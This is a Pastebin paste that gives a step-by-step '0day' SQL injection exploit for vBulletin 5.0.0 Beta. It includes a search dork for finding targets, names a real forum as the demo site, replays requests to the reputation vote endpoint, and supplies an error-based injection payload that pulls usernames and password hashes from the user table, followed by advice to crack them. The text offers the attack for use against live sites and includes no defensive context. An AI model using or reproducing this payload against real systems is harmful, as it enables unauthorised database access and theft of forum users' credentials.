Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day
- #Category: web application
- #Type: SQL Injection
- #Requirements: Firefox/Live HTTP Headers/
- #Dork: Powered by vBulletin™ Version 5.0.0 Beta
- (or) Use ur Brain you'll get more o_O
- Step 1
- Create an Account on vBulletin forum Verify the account and Activate it
- For Demo we will use this Forum
- Link = http://www.prospectrush.com/new_forum/
- I have alredy made an account so i wil direct login
- Step 2
- go to/Open any topic and open Live HTTP Headers (https://addons.mozilla.org/en/firefox/addon/live-http-headers/) << download from here
- and then on the Topic page search for "Like" button and Clik on it ....
- then the Http responce would be caught on HTTP HEaders addon
- Step 3
- Go to the first POST in HTTP Headers ,it will look like this
- POST *Something /ajax/api/reputation/vote HTTP/1.1
- select it and click on Replay button
- Step 4
- Then go on Send POST Content and use below Query ,
- just add the Below Query after "noteid=somenumber"
- =======================
- SQL Query
- ) and(select 1 from(select count(*),concat((select
- (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) )
- from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
- =======================
- The Above SQLi command will fetch out the first record from user table(username/password)
- see the username and pass in encrypted get the salt to and decrypt it i wont show decrypting use your brain :)
- =============
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
